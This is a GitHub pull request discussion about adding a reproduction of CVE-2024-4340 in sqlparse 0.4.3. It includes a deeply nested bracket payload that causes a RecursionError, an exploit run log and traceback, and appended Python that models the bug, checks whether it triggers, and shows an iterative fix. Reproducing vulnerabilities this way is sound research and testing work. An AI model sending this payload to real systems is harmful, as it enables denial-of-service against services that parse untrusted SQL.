add CVE-2024-4340 #39

Open. Wants to merge 1 commit into base: main.
Conversation

praneeth-bala
Contributor

No description provided.


- name: Install vulnerable sqlparse version
  pip:
    name: sqlparse==0.4.3

Please put this package in the data folder and install it from the file.


olegbck commented Dec 6, 2024

Also, the exploit fails to execute (as I thought):

2024-12-06 13:15:06,323 - INFO - [ubuntu] Executing 'strace -o /tmp/cvex/ubuntu_strace_python3_0.log python3 /tmp/exploit.py'...
2024-12-06 13:15:46,558 - CRITICAL - [main] Command failed: <UnexpectedExit: cmd='strace -o /tmp/cvex/ubuntu_strace_python3_0.log python3 /tmp/exploit.py' exited=1>

After trying to run it manually, I see this:

vagrant@ubuntu:~$ python3 /tmp/exploit.py
Traceback (most recent call last):
  File "/tmp/exploit.py", line 2, in <module>
    sqlparse.parse('[' * 10000 + ']' * 10000)
  File "/usr/local/lib/python3.10/dist-packages/sqlparse/__init__.py", line 30, in parse
    return tuple(parsestream(sql, encoding))
  File "/usr/local/lib/python3.10/dist-packages/sqlparse/engine/filter_stack.py", line 36, in run
    stmt = grouping.group(stmt)
  File "/usr/local/lib/python3.10/dist-packages/sqlparse/engine/grouping.py", line 428, in group
    func(stmt)
  File "/usr/local/lib/python3.10/dist-packages/sqlparse/engine/grouping.py", line 53, in group_brackets
    _group_matching(tlist, sql.SquareBrackets)
  File "/usr/local/lib/python3.10/dist-packages/sqlparse/engine/grouping.py", line 48, in _group_matching
    tlist.group_tokens(cls, open_idx, close_idx)
  File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 328, in group_tokens
    grp = grp_cls(subtokens)
  File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 161, in __init__
    super().__init__(None, str(self))
  File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 165, in __str__
    return ''.join(token.value for token in self.flatten())
  File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 165, in <genexpr>
    return ''.join(token.value for token in self.flatten())
  File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 214, in flatten
    yield from token.flatten()
  File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 214, in flatten
    yield from token.flatten()
  File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 214, in flatten
    yield from token.flatten()
  [Previous line repeated 983 more times]
RecursionError: maximum recursion depth exceeded

Is that what the exploit is about, RecursionError? If so, please make it more visible. I'd wrap the code of the exploit in try-except and then print "Exploit succeeded" if RecursionError is raised. Otherwise it looks like the exploit is not working.
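The mechanism behind the traceback and the explicit try/except check suggested in the comment, as an added, self-contained example (not code from this PR, and not sqlparse's own code). `Token`, `Group`, `build_tree` and `payload` are a constructed model of what the traceback shows: every matched `[ ... ]` pair becomes a nested group, the group's value is computed by flattening its children at construction time, and `flatten()` delegates with `yield from` one call frame per nesting level, so the default recursion limit of 1000 is hit long before the exploit's 10000 levels. `SafeGroup` is an assumed hardening written for this model (an explicit-stack flatten), not the fix shipped upstream. `probe_sqlparse` runs the same check against the real library only if it happens to be installed; the model never depends on it.

```python
import sys

# Constructed stand-in for the structure in the traceback: sqlparse wraps each
# matched "[ ... ]" pair in a nested group whose flatten() recurses into its
# children ("yield from token.flatten()", sql.py line 214). This is a model
# written for this example, not sqlparse's own code.


class Token:
    def __init__(self, value):
        self.value = value

    def flatten(self):
        yield self


class Group(Token):
    """A bracket group. Its flatten() recurses once per level of nesting."""

    def __init__(self, children):
        self.children = list(children)
        # As in the traceback (sql.py line 161), the group's value is built by
        # flattening its children immediately, so constructing the outermost
        # of N nested groups descends N call frames deep.
        super().__init__(''.join(t.value for t in self.flatten()))

    def flatten(self):
        for child in self.children:
            yield from child.flatten()  # call-stack depth == nesting depth


class SafeGroup(Group):
    """Hardening for this model only (an assumption, not the upstream sqlparse
    fix): walk the tree with an explicit stack so nesting depth no longer
    maps to interpreter call-stack depth."""

    def flatten(self):
        stack = list(reversed(self.children))
        while stack:
            tok = stack.pop()
            if isinstance(tok, Group):
                stack.extend(reversed(tok.children))
            else:
                yield tok


def build_tree(sql, group_cls=Group):
    """Hypothetical stand-in for sqlparse.parse: group matching square
    brackets with an explicit stack (the parse itself never recurses; the
    recursion lives in group_cls.flatten()). Returns the top-level tokens."""
    stack = [[]]
    for ch in sql:
        if ch == '[':
            stack.append([Token(ch)])
        elif ch == ']' and len(stack) > 1:
            children = stack.pop()
            children.append(Token(ch))
            stack[-1].append(group_cls(children))  # may raise RecursionError
        else:
            stack[-1].append(Token(ch))
    while len(stack) > 1:  # unmatched '[': leave its tokens ungrouped
        stack[-2].extend(stack.pop())
    return stack[0]


def payload(depth):
    """The exploit's input from the traceback, parameterised by depth."""
    return '[' * depth + ']' * depth


def probe(parse, sql):
    """The check the review asks for: run the parser inside try/except and
    report explicitly. True means the RecursionError the CVE is about fired."""
    try:
        parse(sql)
    except RecursionError:
        return True
    return False


def probe_sqlparse(sql):
    """Same check against the real library when it is installed (the PR
    installs sqlparse==0.4.3); returns None if sqlparse is not importable."""
    try:
        import sqlparse
    except ImportError:
        return None
    return probe(sqlparse.parse, sql)


if __name__ == '__main__':
    verdict = lambda hit: 'Exploit succeeded' if hit else 'Exploit failed'
    print('recursion limit:', sys.getrecursionlimit())
    print('model, recursive flatten:', verdict(probe(build_tree, payload(10_000))))
    # SafeGroup still builds every group's value eagerly (O(n^2) characters
    # overall), so use a depth that is past the recursion limit but smaller.
    print('model, iterative flatten:',
          verdict(probe(lambda s: build_tree(s, SafeGroup), payload(2_000))))
    real = probe_sqlparse(payload(10_000))
    if real is not None:
        print('installed sqlparse:', verdict(real))
```

The vulnerable model reports "Exploit succeeded" at depth 10000 with the default recursion limit, which is the visible outcome the comment asks the exploit script to print; the same `probe` wrapper around `sqlparse.parse` gives the PR's exploit an explicit pass/fail instead of an uncaught traceback and a non-zero exit.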
